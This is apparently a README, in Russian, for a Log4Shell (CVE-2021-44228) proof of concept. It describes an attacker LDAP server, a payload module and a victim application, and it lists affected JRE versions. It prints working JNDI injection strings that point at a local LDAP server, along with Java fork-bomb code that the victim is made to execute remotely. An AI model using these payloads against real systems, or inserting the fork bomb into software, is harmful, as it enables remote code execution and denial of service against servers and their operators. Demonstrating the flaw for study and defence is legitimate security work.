log4j-exploit-with-fork-bomb
💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228
-
Создаем LDAP сервер атакующего (модуль server), который будет выдавать представления строк и кода (модуль payload)
-
Создаем пример жертвы (модуль victim) и передаем в Log4j строку Версия JRE <= 6u211, 7u201, 8u191 и 11.0.1
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
-
Приложение-жертва получит от сервера атакующего массив байт и интерпретирует их в подставляемую строку или в выполяемый код (параметр
com.sun.jndi.ldap.object.trustURLCodebase = true
) -
Для примера, исполняемым кодом будет fork-бомба (программа, которая запускает свои копии забивая все процессорное время)
public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}